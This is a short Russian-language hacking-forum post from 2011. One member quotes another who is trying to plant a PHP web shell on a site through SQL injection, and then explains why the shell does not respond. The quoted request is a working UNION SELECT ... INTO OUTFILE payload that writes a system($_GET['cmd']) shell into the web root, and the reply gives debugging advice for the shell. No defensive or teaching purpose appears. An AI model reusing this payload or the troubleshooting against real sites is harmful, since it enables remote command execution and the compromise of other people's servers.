09.11.2011, 14:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от aydin-ka
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
Запрос
Код:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--
Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию) phpinfo() это функция, а не константа, после имени идут скобки и " ; "
+ у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды
|
|
|